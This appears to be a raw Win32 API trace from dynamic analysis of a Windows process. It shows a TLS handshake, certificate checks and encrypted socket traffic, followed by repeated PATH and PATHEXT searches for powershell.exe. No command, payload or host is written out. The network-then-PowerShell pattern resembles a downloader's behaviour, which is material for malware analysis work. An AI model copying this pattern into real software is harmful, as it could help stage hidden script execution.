	[0192.016] InitializeSecurityContextW (in: phCredential=0x5fce2d4, phContext=0x5fce3e8, pTargetName=0x2c4c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2c69128, Reserved2=0x0, phNewContext=0x2c67cec, pOutput=0x2c6913c, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce2cc | out: phNewContext=0x2c67cec, pOutput=0x2c6913c, pfContextAttr=0x2c661b8, ptsExpiry=0x5fce2cc) returned 0x0
	[0192.879] GetLastError () returned 0x0
	[0192.899] QueryContextAttributesW (in: phContext=0x2c67cec, ulAttribute=0x4, pBuffer=0x2c691e0 | out: pBuffer=0x2c691e0) returned 0x0
	[0192.899] GetLastError () returned 0x0
	[0192.899] QueryContextAttributesW (in: phContext=0x2c67cec, ulAttribute=0x5a, pBuffer=0x2c69230 | out: pBuffer=0x2c69230) returned 0x0
	[0192.944] GetLastError () returned 0x0
	[0192.954] QueryContextAttributesW (in: phContext=0x2c67cec, ulAttribute=0x53, pBuffer=0x2c694fc | out: pBuffer=0x2c694fc) returned 0x0
	[0192.957] GetLastError () returned 0x80092004
	[0192.988] CertDuplicateCRLContext (pCrlContext=0x797498) returned 0x797498
	[0192.988] GetLastError () returned 0x80092004
	[0192.993] CertDuplicateStore (hCertStore=0x728798) returned 0x728798
	[0192.993] GetLastError () returned 0x80092004
	[0192.993] CertEnumCertificatesInStore (hCertStore=0x728798, pPrevCertContext=0x0) returned 0x7974e8
	[0192.993] GetLastError () returned 0x80092004
	[0192.993] CertDuplicateCRLContext (pCrlContext=0x7974e8) returned 0x7974e8
	[0192.993] GetLastError () returned 0x80092004
	[0192.996] CertEnumCertificatesInStore (hCertStore=0x728798, pPrevCertContext=0x7974e8) returned 0x797498
	[0192.996] GetLastError () returned 0x80092004
	[0192.996] CertDuplicateCRLContext (pCrlContext=0x797498) returned 0x797498
	[0192.996] GetLastError () returned 0x80092004
	[0192.996] CertEnumCertificatesInStore (hCertStore=0x728798, pPrevCertContext=0x797498) returned 0x0
	[0192.996] GetLastError () returned 0x80092004
	[0192.996] CertCloseStore (hCertStore=0x728798, dwFlags=0x0) returned 1
	[0192.996] GetLastError () returned 0x80092004
	[0192.996] CertFreeCRLContext (pCrlContext=0x797498) returned 1
	[0192.996] GetLastError () returned 0x80092004
	[0193.023] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x728810
	[0193.023] GetLastError () returned 0x80092004
	[0193.026] CertAddCRLLinkToStore (in: hCertStore=0x728810, pCrlContext=0x7974e8, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0193.082] GetLastError () returned 0x80092004
	[0193.082] CertAddCRLLinkToStore (in: hCertStore=0x728810, pCrlContext=0x797498, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0193.082] GetLastError () returned 0x80092004
	[0193.085] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x797498, pTime=0x5fce360, hAdditionalStore=0x728810, pChainPara=0x7837d8, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x5fce2a0 | out: ppChainContext=0x5fce2a0) returned 1
	[0194.176] GetLastError () returned 0x80092004
	[0194.178] CertDuplicateCertificateChain (pChainContext=0x620bdf8) returned 0x620bdf8
	[0194.178] GetLastError () returned 0x80092004
	[0194.180] CertDuplicateCRLContext (pCrlContext=0x797498) returned 0x797498
	[0194.180] GetLastError () returned 0x80092004
	[0194.180] CertDuplicateCRLContext (pCrlContext=0x62a0af0) returned 0x62a0af0
	[0194.180] GetLastError () returned 0x80092004
	[0194.181] CertDuplicateCRLContext (pCrlContext=0x62a0b40) returned 0x62a0b40
	[0194.181] GetLastError () returned 0x80092004
	[0194.181] CertFreeCertificateChain (pChainContext=0x620bdf8) 
	[0194.182] GetLastError () returned 0x80092004
	[0194.183] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x620bdf8, pPolicyPara=0x5fce448, pPolicyStatus=0x5fce434 | out: pPolicyStatus=0x5fce434) returned 1
	[0194.184] GetLastError () returned 0x0
	[0194.184] SetLastError (dwErrCode=0x0) 
	[0194.184] GetLastError () returned 0x0
	[0194.188] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x620bdf8, pPolicyPara=0x5fce4c4, pPolicyStatus=0x5fce458 | out: pPolicyStatus=0x5fce458) returned 1
	[0194.188] GetLastError () returned 0x0
	[0194.204] CertFreeCertificateChain (pChainContext=0x620bdf8) 
	[0194.204] GetLastError () returned 0x0
	[0194.204] CertFreeCRLContext (pCrlContext=0x797498) returned 1
	[0194.205] GetLastError () returned 0x0
	[0194.214] EncryptMessage (in: phContext=0x2c67cec, fQOP=0x0, pMessage=0x2c6b088, MessageSeqNo=0x0 | out: pMessage=0x2c6b088) returned 0x0
	[0194.214] GetLastError () returned 0x0
	[0194.214] send (s=0x4e4, buf=0x2c6aedc*, len=117, flags=0) returned 117
	[0194.214] GetLastError () returned 0x0
	[0194.239] setsockopt (s=0x4e4, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0194.239] GetLastError () returned 0x0
	[0194.239] recv (in: s=0x4e4, buf=0x2c6b1c0, len=5, flags=0 | out: buf=0x2c6b1c0*) returned 5
	[0194.276] GetLastError () returned 0x0
	[0194.276] recv (in: s=0x4e4, buf=0x2c6b1d9, len=2112, flags=0 | out: buf=0x2c6b1d9*) returned 2112
	[0194.276] GetLastError () returned 0x0
	[0194.279] DecryptMessage (in: phContext=0x2c67cec, pMessage=0x2c6bab4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2c6bab4, pfQOP=0x0) returned 0x0
	[0194.279] GetLastError () returned 0x0
	[0194.298] setsockopt (s=0x4e4, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0194.298] GetLastError () returned 0x0
	[0194.298] SetEvent (hEvent=0x39c) returned 1
	[0194.298] GetLastError () returned 0x0
	[0194.368] VirtualQuery (in: lpAddress=0x5fcde94, lpBuffer=0x5fcee94, dwLength=0x1c | out: lpBuffer=0x5fcee94*(BaseAddress=0x5fcd000, AllocationBase=0x5640000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0194.373] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0194.373] GetLastError () returned 0x0
	[0194.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0194.430] GetLastError () returned 0x0
	[0194.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x783790, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0194.430] GetLastError () returned 0x0
	[0194.438] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x786f38 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0194.438] GetLastError () returned 0x0
	[0194.451] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.451] GetLastError () returned 0x0
	[0194.453] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.453] GetLastError () returned 0x3
	[0194.705] SetErrorMode (uMode=0x1) returned 0x1
	[0194.709] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.709] GetLastError () returned 0x3
	[0194.709] SetErrorMode (uMode=0x1) returned 0x1
	[0194.709] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.ps1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.709] GetLastError () returned 0x3
	[0194.712] SetErrorMode (uMode=0x1) returned 0x1
	[0194.712] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.712] GetLastError () returned 0x3
	[0194.712] SetErrorMode (uMode=0x1) returned 0x1
	[0194.712] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psm1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.712] GetLastError () returned 0x3
	[0194.715] SetErrorMode (uMode=0x1) returned 0x1
	[0194.715] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.715] GetLastError () returned 0x3
	[0194.715] SetErrorMode (uMode=0x1) returned 0x1
	[0194.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psd1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.716] GetLastError () returned 0x3
	[0194.718] SetErrorMode (uMode=0x1) returned 0x1
	[0194.719] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.719] GetLastError () returned 0x3
	[0194.719] SetErrorMode (uMode=0x1) returned 0x1
	[0194.719] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.COM", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.719] GetLastError () returned 0x3
	[0194.722] SetErrorMode (uMode=0x1) returned 0x1
	[0194.723] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.723] GetLastError () returned 0x3
	[0194.723] SetErrorMode (uMode=0x1) returned 0x1
	[0194.723] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.EXE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.723] GetLastError () returned 0x3
	[0194.726] SetErrorMode (uMode=0x1) returned 0x1
	[0194.726] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.726] GetLastError () returned 0x3
	[0194.726] SetErrorMode (uMode=0x1) returned 0x1
	[0194.726] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.BAT", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.727] GetLastError () returned 0x3
	[0194.729] SetErrorMode (uMode=0x1) returned 0x1
	[0194.730] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.730] GetLastError () returned 0x3
	[0194.730] SetErrorMode (uMode=0x1) returned 0x1
	[0194.730] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.CMD", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.730] GetLastError () returned 0x3
	[0194.733] SetErrorMode (uMode=0x1) returned 0x1
	[0194.733] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.733] GetLastError () returned 0x3
	[0194.733] SetErrorMode (uMode=0x1) returned 0x1
	[0194.733] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBS", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.733] GetLastError () returned 0x3
	[0194.852] SetErrorMode (uMode=0x1) returned 0x1
	[0194.853] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.853] GetLastError () returned 0x3
	[0194.853] SetErrorMode (uMode=0x1) returned 0x1
	[0194.853] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.853] GetLastError () returned 0x3
	[0194.856] SetErrorMode (uMode=0x1) returned 0x1
	[0194.856] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.856] GetLastError () returned 0x3
	[0194.856] SetErrorMode (uMode=0x1) returned 0x1
	[0194.856] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JS", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.856] GetLastError () returned 0x3
	[0194.859] SetErrorMode (uMode=0x1) returned 0x1
	[0194.859] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.859] GetLastError () returned 0x3
	[0194.859] SetErrorMode (uMode=0x1) returned 0x1
	[0194.859] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JSE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.860] GetLastError () returned 0x3
	[0194.862] SetErrorMode (uMode=0x1) returned 0x1
	[0194.862] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.863] GetLastError () returned 0x3
	[0194.863] SetErrorMode (uMode=0x1) returned 0x1
	[0194.863] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSF", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.863] GetLastError () returned 0x3
	[0194.865] SetErrorMode (uMode=0x1) returned 0x1
	[0194.866] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.866] GetLastError () returned 0x3
	[0194.866] SetErrorMode (uMode=0x1) returned 0x1
	[0194.866] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSH", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.866] GetLastError () returned 0x3
	[0194.869] SetErrorMode (uMode=0x1) returned 0x1
	[0194.869] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.869] GetLastError () returned 0x3
	[0194.869] SetErrorMode (uMode=0x1) returned 0x1
	[0194.869] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.MSC", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.869] GetLastError () returned 0x3
	[0194.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.872] GetLastError () returned 0x3
	[0194.872] SetErrorMode (uMode=0x1) returned 0x1
	[0194.872] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.872] GetLastError () returned 0x2
	[0194.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.873] GetLastError () returned 0x2
	[0194.873] SetErrorMode (uMode=0x1) returned 0x1
	[0194.873] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.ps1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.873] GetLastError () returned 0x2
	[0194.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.873] GetLastError () returned 0x2
	[0194.873] SetErrorMode (uMode=0x1) returned 0x1
	[0194.873] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psm1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.874] GetLastError () returned 0x2
	[0194.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.874] GetLastError () returned 0x2
	[0194.874] SetErrorMode (uMode=0x1) returned 0x1
	[0194.874] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psd1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.874] GetLastError () returned 0x2
	[0194.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.874] GetLastError () returned 0x2
	[0194.874] SetErrorMode (uMode=0x1) returned 0x1
